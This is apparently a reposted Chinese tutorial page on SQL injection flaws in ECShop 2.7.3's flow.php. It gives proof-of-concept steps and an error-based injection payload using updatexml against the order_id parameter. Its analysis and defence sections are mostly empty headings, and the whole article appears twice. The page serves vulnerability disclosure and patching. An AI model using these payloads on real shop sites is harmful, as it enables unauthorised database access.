您现在的位置是:首页 > cms教程 > ecshop商城教程ecshop商城教程
ecshop漏洞修复/flow.php SQL Injection Vul
凌瑶2024-12-18 21:11:46ecshop商城教程已有4人查阅
导读ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
catalog
复制代码
1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考
复制代码
1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
2. 漏洞触发条件
0x1: POC1
复制代码
1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成 4. 就会回显错误页面了
复制代码
0x2: POC2 0x3: order_id注入
http://127.0.0.1/ECShop_V2.7.3/flow.php?step=repurchase
post
order_id=1 or updatexml(1,concat(0x7e,(database())),0) or 11#
file:///C:/Users/zhenghan.zh/Desktop/%E3%80%90%E5%B7%B2%E8%BD%AC%E6%AD%A3%E3%80%91Ecshop3.pdf
3. 漏洞影响范围
4. 漏洞代码分析
0x1: step = consignee 注入点
/flow.php 0x2: step = update_cart 注入点
/flow.php 黑客注入这种payload,实现key sql注入 5. 防御方法
0x1: step = consignee 注入点
/flow.php 需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错
Can't use function return value in write context
0x2: step = update_cart 注入点 0x3: step = order_id 注入点 6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
复制代码
1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考
复制代码
1. 漏洞描述
ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞,攻击者可利用火狐tamper data等插件修改提交到配送地址页面的post数据,造成未授权的数据库操作甚至执行任意代码
Relevant Link:
2. 漏洞触发条件
0x1: POC1
复制代码
1. 先注册账户,随便选个商品进购物车,然后填地址,电话等等
2. 把任意商品加入购物车在填写配送地址那一页,有地区选择
3. http://localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1
//比如省选择安徽
3. 其中POST数据如下
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
用firefox tamper data改成 4. 就会回显错误页面了
复制代码
0x2: POC2 0x3: order_id注入
http://127.0.0.1/ECShop_V2.7.3/flow.php?step=repurchase
post
order_id=1 or updatexml(1,concat(0x7e,(database())),0) or 11#
file:///C:/Users/zhenghan.zh/Desktop/%E3%80%90%E5%B7%B2%E8%BD%AC%E6%AD%A3%E3%80%91Ecshop3.pdf
3. 漏洞影响范围
4. 漏洞代码分析
0x1: step = consignee 注入点
/flow.php 0x2: step = update_cart 注入点
/flow.php 黑客注入这种payload,实现key sql注入 5. 防御方法
0x1: step = consignee 注入点
/flow.php 需要注意的是,empty函数参数必须为variable,不能为其它函数的返回值,包括str_replace、trim等等,否则会报错
Can't use function return value in write context
0x2: step = update_cart 注入点 0x3: step = order_id 注入点 6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
本文标签:
很赞哦! (0)
下一篇:ecshop怎么增加模板页
暂无内容 |
暂无内容 |
相关文章
暂无内容 |
暂无内容 |
随机图文
discuz和ecshop的伪静态规则(apache+nginx)写法
discuz(nginx): (备注:该规则也适用于二级目录)ecshop(nginx): (备注:其中if那里可以不要;如果在二级目录,则每条规则需要加上子目录名称)ecshop安装报错的解决方法
版本: ecmoban_V2.7.3_UTF8_20150623一。 给 C:\Windows\temp目录增加 IIS_Users 完全权限。二。安装报错:Warning: date_default_timezone_get(): It is not safe to relecshop的session机制介绍
ecshop的cls_session.php分析,主要是讲述ecshop中的session机制。我们都知道eschop的session都是存储在数据库中的。ecshop的session都是自定义的。ecshop出现transport和jquery冲突的解决方法实例
众所周知:ecshop的transport.js文件和Jquery是冲突的,两个文件不能同时调用,现给出以下完美解决方案:在transport.js文件中,大概 580行到590行之间,这个句用于格式化json,他重写了object的结构,导致于js框架冲突。
留言与评论 (共有 0 条评论) |